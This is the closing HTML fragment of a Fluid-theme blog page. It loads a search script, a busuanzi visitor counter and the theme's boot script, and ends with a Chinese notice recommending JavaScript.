  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/myblog/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/myblog/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
